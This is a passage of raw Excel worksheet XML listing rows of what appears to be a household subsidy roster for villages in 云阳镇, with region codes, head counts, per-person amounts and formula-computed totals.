      <c r="B1547" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1547" s="24" t="s">
        <v>4159</v>
      </c>
      <c r="D1547" s="24" t="s">
        <v>4160</v>
      </c>
      <c r="E1547" s="24" t="s">
        <v>3604</v>
      </c>
      <c r="F1547" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1547" s="24">
        <v>1</v>
      </c>
      <c r="H1547" s="25">
        <v>365</v>
      </c>
      <c r="I1547" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1547" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1547" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1548" customHeight="1" spans="1:11">
      <c r="A1548" s="23" t="s">
        <v>4161</v>
      </c>
      <c r="B1548" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1548" s="24" t="s">
        <v>4162</v>
      </c>
      <c r="D1548" s="24" t="s">
        <v>4163</v>
      </c>
      <c r="E1548" s="24" t="s">
        <v>4164</v>
      </c>
      <c r="F1548" s="24" t="s">
        <v>4165</v>
      </c>
      <c r="G1548" s="24">
        <v>1</v>
      </c>
      <c r="H1548" s="25">
        <v>365</v>
      </c>
      <c r="I1548" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1548" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1548" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1549" customHeight="1" spans="1:11">
      <c r="A1549" s="23" t="s">
        <v>4167</v>
      </c>
      <c r="B1549" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1549" s="24" t="s">
        <v>4162</v>
      </c>
      <c r="D1549" s="24" t="s">
        <v>4168</v>
      </c>
      <c r="E1549" s="24" t="s">
        <v>3584</v>
      </c>
      <c r="F1549" s="24" t="s">
        <v>4165</v>
      </c>
      <c r="G1549" s="24">
        <v>1</v>
      </c>
      <c r="H1549" s="25">
        <v>365</v>
      </c>
      <c r="I1549" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1549" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1549" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1550" customHeight="1" spans="1:11">
      <c r="A1550" s="23" t="s">
        <v>4169</v>
      </c>
      <c r="B1550" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1550" s="24" t="s">
        <v>4162</v>
      </c>
      <c r="D1550" s="24" t="s">
        <v>4170</v>
      </c>
      <c r="E1550" s="24" t="s">
        <v>2566</v>
      </c>
      <c r="F1550" s="24" t="s">
        <v>4165</v>
      </c>
      <c r="G1550" s="24">
        <v>2</v>
      </c>
      <c r="H1550" s="25">
        <v>325</v>
      </c>
      <c r="I1550" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1550" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1550" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1551" customHeight="1" spans="1:11">
      <c r="A1551" s="23" t="s">
        <v>4171</v>
      </c>
      <c r="B1551" s="24" t="str">
        <f>B1550</f>
        <v>云阳镇</v>
      </c>
      <c r="C1551" s="24" t="str">
        <f>C1550</f>
        <v>西关居委会</v>
      </c>
      <c r="D1551" s="23" t="s">
        <v>4172</v>
      </c>
      <c r="E1551" s="23" t="s">
        <v>4173</v>
      </c>
      <c r="F1551" s="24" t="str">
        <f>F1550</f>
        <v>4113210524</v>
      </c>
      <c r="G1551" s="24"/>
      <c r="H1551" s="24"/>
      <c r="I1551" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1551" s="24"/>
      <c r="K1551" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1552" customHeight="1" spans="1:11">
      <c r="A1552" s="23" t="s">
        <v>4174</v>
      </c>
      <c r="B1552" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1552" s="24" t="s">
        <v>4175</v>
      </c>
      <c r="D1552" s="24" t="s">
        <v>4176</v>
      </c>
      <c r="E1552" s="24" t="s">
        <v>3489</v>
      </c>
      <c r="F1552" s="24" t="s">
        <v>4177</v>
      </c>
      <c r="G1552" s="24">
        <v>1</v>
      </c>
      <c r="H1552" s="25">
        <v>365</v>
      </c>
      <c r="I1552" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1552" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1552" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1553" customHeight="1" spans="1:11">
      <c r="A1553" s="23" t="s">
        <v>4178</v>
      </c>
      <c r="B1553" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1553" s="24" t="s">
        <v>4179</v>
      </c>
      <c r="D1553" s="24" t="s">
        <v>3024</v>
      </c>
      <c r="E1553" s="24" t="s">
        <v>4180</v>
      </c>
      <c r="F1553" s="24" t="s">
        <v>4177</v>
      </c>
      <c r="G1553" s="24">
        <v>2</v>
      </c>
      <c r="H1553" s="25">
        <v>325</v>
      </c>
      <c r="I1553" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1553" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1553" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1554" customHeight="1" spans="1:11">
      <c r="A1554" s="23" t="s">
        <v>4181</v>
      </c>
      <c r="B1554" s="24" t="str">
        <f>B1553</f>
        <v>云阳镇</v>
      </c>
      <c r="C1554" s="24" t="str">
        <f>C1553</f>
        <v>狮子坟三里店</v>
      </c>
      <c r="D1554" s="23" t="s">
        <v>4182</v>
      </c>
      <c r="E1554" s="23" t="s">
        <v>4183</v>
      </c>
      <c r="F1554" s="24" t="str">
        <f>F1553</f>
        <v>4113210508</v>
      </c>
      <c r="G1554" s="24"/>
      <c r="H1554" s="24"/>
      <c r="I1554" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1554" s="24"/>
      <c r="K1554" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1555" customHeight="1" spans="1:11">
      <c r="A1555" s="23" t="s">
        <v>4184</v>
      </c>
      <c r="B1555" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1555" s="24" t="s">
        <v>4185</v>
      </c>
      <c r="D1555" s="24" t="s">
        <v>4186</v>
      </c>
      <c r="E1555" s="24" t="s">
        <v>4187</v>
      </c>
      <c r="F1555" s="24" t="s">
        <v>4177</v>
      </c>
      <c r="G1555" s="24">
        <v>1</v>
      </c>
      <c r="H1555" s="25">
        <v>365</v>
      </c>
      <c r="I1555" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1555" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1555" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1556" customHeight="1" spans="1:11">
      <c r="A1556" s="23" t="s">
        <v>4188</v>
      </c>
      <c r="B1556" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1556" s="24" t="s">
        <v>4189</v>
      </c>
      <c r="D1556" s="24" t="s">
        <v>4190</v>
      </c>
      <c r="E1556" s="24" t="s">
        <v>4191</v>
      </c>
      <c r="F1556" s="24" t="s">
        <v>4192</v>
      </c>
      <c r="G1556" s="24">
        <v>2</v>
      </c>
      <c r="H1556" s="25">
        <v>325</v>
      </c>
      <c r="I1556" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1556" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1556" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1557" customHeight="1" spans="1:11">
      <c r="A1557" s="23" t="s">
        <v>4193</v>
      </c>
      <c r="B1557" s="24" t="str">
        <f>B1556</f>
        <v>云阳镇</v>
      </c>
      <c r="C1557" s="24" t="str">
        <f>C1556</f>
        <v>杨岗村</v>
      </c>
      <c r="D1557" s="30" t="s">
        <v>4194</v>
      </c>
      <c r="E1557" s="30" t="s">
        <v>4195</v>
      </c>
      <c r="F1557" s="24" t="str">
        <f>F1556</f>
        <v>4113210516</v>
      </c>
      <c r="G1557" s="24"/>
      <c r="H1557" s="24"/>
      <c r="I1557" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1557" s="24"/>
      <c r="K1557" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1558" customHeight="1" spans="1:11">
      <c r="A1558" s="23" t="s">
        <v>4196</v>
      </c>
      <c r="B1558" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1558" s="24" t="s">
        <v>4197</v>
      </c>
      <c r="D1558" s="24" t="s">
        <v>4198</v>
      </c>
      <c r="E1558" s="24" t="s">
        <v>4199</v>
      </c>
      <c r="F1558" s="24" t="s">
        <v>4200</v>
      </c>
      <c r="G1558" s="24">
        <v>1</v>
      </c>
      <c r="H1558" s="25">
        <v>365</v>
      </c>
      <c r="I1558" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1558" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1558" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1559" customHeight="1" spans="1:11">
      <c r="A1559" s="23" t="s">
        <v>4201</v>
      </c>
      <c r="B1559" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1559" s="24" t="s">
        <v>4197</v>
      </c>
      <c r="D1559" s="24" t="s">
        <v>4202</v>
      </c>
      <c r="E1559" s="24" t="s">
        <v>4203</v>
      </c>
      <c r="F1559" s="24" t="s">
        <v>4149</v>
      </c>
      <c r="G1559" s="24">
        <v>1</v>
      </c>
      <c r="H1559" s="24">
        <v>335</v>
      </c>
      <c r="I1559" s="24">
        <f t="shared" si="24"/>
        <v>335</v>
      </c>
      <c r="J1559" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1559" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1560" customHeight="1" spans="1:11">
      <c r="A1560" s="23" t="s">
        <v>4204</v>
      </c>
      <c r="B1560" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1560" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1560" s="24" t="s">
        <v>4206</v>
      </c>
      <c r="E1560" s="24" t="s">
        <v>3679</v>
      </c>
      <c r="F1560" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1560" s="24">
        <v>1</v>
      </c>
      <c r="H1560" s="25">
        <v>365</v>
      </c>
      <c r="I1560" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1560" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1560" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1561" customHeight="1" spans="1:11">
      <c r="A1561" s="23" t="s">
        <v>4207</v>
      </c>
      <c r="B1561" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1561" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1561" s="24" t="s">
        <v>4208</v>
      </c>
      <c r="E1561" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1561" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1561" s="24">
        <v>1</v>
      </c>
      <c r="H1561" s="25">
        <v>365</v>
      </c>
      <c r="I1561" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1561" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1561" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1562" customHeight="1" spans="1:11">
      <c r="A1562" s="23" t="s">
        <v>4209</v>
      </c>
      <c r="B1562" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1562" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1562" s="24" t="s">
        <v>4210</v>
      </c>
      <c r="E1562" s="24" t="s">
        <v>2566</v>
      </c>
      <c r="F1562" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1562" s="24">
        <v>1</v>
      </c>
      <c r="H1562" s="25">
        <v>365</v>
      </c>
      <c r="I1562" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1562" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1562" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1563" customHeight="1" spans="1:11">
      <c r="A1563" s="23" t="s">
        <v>4211</v>
      </c>
      <c r="B1563" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1563" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1563" s="24" t="s">
        <v>4212</v>
      </c>
      <c r="E1563" s="24" t="s">
        <v>4213</v>
      </c>
      <c r="F1563" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1563" s="24">
        <v>1</v>
      </c>
      <c r="H1563" s="25">
        <v>365</v>
      </c>
      <c r="I1563" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1563" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1563" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1564" customHeight="1" spans="1:11">
      <c r="A1564" s="23" t="s">
        <v>4214</v>
      </c>
      <c r="B1564" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1564" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1564" s="24" t="s">
        <v>4215</v>
      </c>
      <c r="E1564" s="24" t="s">
        <v>4216</v>
      </c>
      <c r="F1564" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1564" s="24">
        <v>1</v>
      </c>
      <c r="H1564" s="25">
        <v>365</v>
      </c>
      <c r="I1564" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1564" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1564" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1565" customHeight="1" spans="1:11">
      <c r="A1565" s="23" t="s">
        <v>4217</v>
      </c>
      <c r="B1565" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1565" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1565" s="24" t="s">
        <v>4218</v>
      </c>
      <c r="E1565" s="24" t="s">
        <v>4219</v>
      </c>
      <c r="F1565" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1565" s="24">
        <v>1</v>
      </c>
      <c r="H1565" s="25">
        <v>365</v>
      </c>
      <c r="I1565" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1565" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1565" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1566" customHeight="1" spans="1:11">
      <c r="A1566" s="23" t="s">
        <v>4220</v>
      </c>
      <c r="B1566" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1566" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1566" s="24" t="s">
        <v>4221</v>
      </c>
      <c r="E1566" s="24" t="s">
        <v>3580</v>
      </c>
      <c r="F1566" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1566" s="24">
        <v>1</v>
      </c>
      <c r="H1566" s="25">
        <v>365</v>
      </c>
      <c r="I1566" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1566" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1566" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1567" customHeight="1" spans="1:11">
      <c r="A1567" s="23" t="s">
        <v>4222</v>
      </c>
      <c r="B1567" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1567" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1567" s="24" t="s">
        <v>4223</v>
      </c>
      <c r="E1567" s="24" t="s">
        <v>425</v>
      </c>
      <c r="F1567" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1567" s="24">
        <v>2</v>
      </c>
      <c r="H1567" s="25">
        <v>325</v>
      </c>
      <c r="I1567" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1567" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1567" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1568" customHeight="1" spans="1:11">
      <c r="A1568" s="23" t="s">
        <v>4224</v>
      </c>
      <c r="B1568" s="24" t="str">
        <f>B1567</f>
        <v>云阳镇</v>
      </c>
      <c r="C1568" s="24" t="str">
        <f>C1567</f>
        <v>南召店</v>
      </c>
      <c r="D1568" s="23" t="s">
        <v>4225</v>
      </c>
      <c r="E1568" s="23" t="s">
        <v>4226</v>
      </c>
      <c r="F1568" s="24" t="str">
        <f>F1567</f>
        <v>4113210519</v>
      </c>
      <c r="G1568" s="24"/>
      <c r="H1568" s="24"/>
      <c r="I1568" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1568" s="24"/>
      <c r="K1568" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1569" customHeight="1" spans="1:11">
      <c r="A1569" s="23" t="s">
        <v>4227</v>
      </c>
      <c r="B1569" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1569" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1569" s="24" t="s">
        <v>4228</v>
      </c>
      <c r="E1569" s="24" t="s">
        <v>4229</v>
      </c>
      <c r="F1569" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1569" s="24">
        <v>1</v>
      </c>
      <c r="H1569" s="25">
        <v>365</v>
      </c>
      <c r="I1569" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1569" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1569" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1570" customHeight="1" spans="1:11">
      <c r="A1570" s="23" t="s">
        <v>4230</v>
      </c>
      <c r="B1570" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1570" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1570" s="24" t="s">
        <v>4231</v>
      </c>
      <c r="E1570" s="24" t="s">
        <v>4232</v>
      </c>
      <c r="F1570" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1570" s="24">
        <v>1</v>
      </c>
      <c r="H1570" s="25">
        <v>365</v>
      </c>
      <c r="I1570" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1570" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1570" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1571" customHeight="1" spans="1:11">
      <c r="A1571" s="23" t="s">
        <v>4233</v>
      </c>
      <c r="B1571" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1571" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1571" s="24" t="s">
        <v>4234</v>
      </c>
      <c r="E1571" s="24" t="s">
        <v>3802</v>
      </c>
      <c r="F1571" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1571" s="24">
        <v>1</v>
      </c>
      <c r="H1571" s="25">
        <v>365</v>
      </c>
      <c r="I1571" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1571" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1571" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1572" customHeight="1" spans="1:11">
      <c r="A1572" s="23" t="s">
        <v>4235</v>
      </c>
      <c r="B1572" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1572" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1572" s="24" t="s">
        <v>4236</v>
      </c>
      <c r="E1572" s="24" t="s">
        <v>4237</v>
      </c>
      <c r="F1572" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1572" s="24">
        <v>1</v>
      </c>
      <c r="H1572" s="25">
        <v>365</v>
      </c>
      <c r="I1572" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1572" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1572" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1573" customHeight="1" spans="1:11">
      <c r="A1573" s="23" t="s">
        <v>4238</v>
      </c>
      <c r="B1573" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1573" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1573" s="24" t="s">
        <v>4239</v>
      </c>
      <c r="E1573" s="24" t="s">
        <v>3695</v>
      </c>
      <c r="F1573" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1573" s="24">
        <v>1</v>
      </c>
      <c r="H1573" s="25">
        <v>365</v>
      </c>
      <c r="I1573" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1573" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1573" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1574" customHeight="1" spans="1:11">
      <c r="A1574" s="23" t="s">
        <v>4240</v>
      </c>
      <c r="B1574" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1574" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1574" s="24" t="s">
        <v>4241</v>
      </c>
      <c r="E1574" s="24" t="s">
        <v>3344</v>
      </c>
      <c r="F1574" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1574" s="24">
        <v>2</v>
      </c>
      <c r="H1574" s="25">
        <v>325</v>
      </c>
      <c r="I1574" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1574" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1574" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1575" customHeight="1" spans="1:11">
      <c r="A1575" s="23" t="s">
        <v>4242</v>
      </c>
      <c r="B1575" s="24" t="str">
        <f>B1574</f>
        <v>云阳镇</v>
      </c>
      <c r="C1575" s="24" t="str">
        <f>C1574</f>
        <v>南召店</v>
      </c>
      <c r="D1575" s="23" t="s">
        <v>4243</v>
      </c>
      <c r="E1575" s="23" t="s">
        <v>4244</v>
      </c>
      <c r="F1575" s="24" t="str">
        <f>F1574</f>
        <v>4113210519</v>
      </c>
      <c r="G1575" s="24"/>
      <c r="H1575" s="24"/>
      <c r="I1575" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1575" s="24"/>
      <c r="K1575" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1576" customHeight="1" spans="1:11">
      <c r="A1576" s="23" t="s">
        <v>4245</v>
      </c>
      <c r="B1576" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1576" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1576" s="24" t="s">
        <v>2937</v>
      </c>
      <c r="E1576" s="24" t="s">
        <v>3832</v>
      </c>
      <c r="F1576" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1576" s="24">
        <v>1</v>
      </c>
      <c r="H1576" s="25">
        <v>365</v>
      </c>
      <c r="I1576" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1576" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1576" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1577" customHeight="1" spans="1:11">
      <c r="A1577" s="23" t="s">
        <v>4246</v>
      </c>
      <c r="B1577" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1577" s="24" t="s">
        <v>4205</v>
      </c>
      <c r="D1577" s="24" t="s">
        <v>4247</v>
      </c>
      <c r="E1577" s="24" t="s">
        <v>3767</v>
      </c>
      <c r="F1577" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1577" s="24">
        <v>1</v>
      </c>
      <c r="H1577" s="25">
        <v>365</v>
      </c>
      <c r="I1577" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1577" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1577" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1578" customHeight="1" spans="1:11">
      <c r="A1578" s="23" t="s">
        <v>4248</v>
      </c>
      <c r="B1578" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1578" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1578" s="24" t="s">
        <v>4250</v>
      </c>
      <c r="E1578" s="24" t="s">
        <v>3641</v>
      </c>
      <c r="F1578" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1578" s="24">
        <v>2</v>
      </c>
      <c r="H1578" s="25">
        <v>325</v>
      </c>
      <c r="I1578" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1578" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1578" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1579" customHeight="1" spans="1:11">
      <c r="A1579" s="23" t="s">
        <v>4251</v>
      </c>
      <c r="B1579" s="24" t="str">
        <f>B1578</f>
        <v>云阳镇</v>
      </c>
      <c r="C1579" s="24" t="str">
        <f>C1578</f>
        <v>小关社区</v>
      </c>
      <c r="D1579" s="24" t="s">
        <v>4252</v>
      </c>
      <c r="E1579" s="23" t="s">
        <v>3727</v>
      </c>
      <c r="F1579" s="24" t="str">
        <f>F1578</f>
        <v>4113210521</v>
      </c>
      <c r="G1579" s="24"/>
      <c r="H1579" s="24"/>
      <c r="I1579" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1579" s="24"/>
      <c r="K1579" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1580" customHeight="1" spans="1:11">
      <c r="A1580" s="23" t="s">
        <v>4253</v>
      </c>
      <c r="B1580" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1580" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1580" s="24" t="s">
        <v>4254</v>
      </c>
      <c r="E1580" s="24" t="s">
        <v>4255</v>
      </c>
      <c r="F1580" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1580" s="24">
        <v>1</v>
      </c>
      <c r="H1580" s="25">
        <v>365</v>
      </c>
      <c r="I1580" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1580" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1580" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1581" customHeight="1" spans="1:11">
      <c r="A1581" s="23" t="s">
        <v>4256</v>
      </c>
      <c r="B1581" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1581" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1581" s="24" t="s">
        <v>4257</v>
      </c>
      <c r="E1581" s="24" t="s">
        <v>3493</v>
      </c>
      <c r="F1581" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1581" s="24">
        <v>1</v>
      </c>
      <c r="H1581" s="25">
        <v>365</v>
      </c>
      <c r="I1581" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1581" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1581" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1582" customHeight="1" spans="1:11">
      <c r="A1582" s="23" t="s">
        <v>4258</v>
      </c>
      <c r="B1582" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1582" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1582" s="24" t="s">
        <v>4259</v>
      </c>
      <c r="E1582" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F1582" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1582" s="24">
        <v>1</v>
      </c>
      <c r="H1582" s="25">
        <v>365</v>
      </c>
      <c r="I1582" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1582" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1582" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1583" customHeight="1" spans="1:11">
      <c r="A1583" s="23" t="s">
        <v>4260</v>
      </c>
      <c r="B1583" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1583" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1583" s="24" t="s">
        <v>4261</v>
      </c>
      <c r="E1583" s="24" t="s">
        <v>3662</v>
      </c>
      <c r="F1583" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1583" s="24">
        <v>1</v>
      </c>
      <c r="H1583" s="25">
        <v>365</v>
      </c>
      <c r="I1583" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1583" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1583" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1584" customHeight="1" spans="1:11">
      <c r="A1584" s="23" t="s">
        <v>4262</v>
      </c>
      <c r="B1584" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1584" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1584" s="24" t="s">
        <v>4263</v>
      </c>
      <c r="E1584" s="24" t="s">
        <v>3759</v>
      </c>
      <c r="F1584" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1584" s="24">
        <v>1</v>
      </c>
      <c r="H1584" s="25">
        <v>365</v>
      </c>
      <c r="I1584" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1584" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1584" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1585" customHeight="1" spans="1:11">
      <c r="A1585" s="23" t="s">
        <v>4264</v>
      </c>
      <c r="B1585" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1585" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1585" s="24" t="s">
        <v>4265</v>
      </c>
      <c r="E1585" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F1585" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1585" s="24">
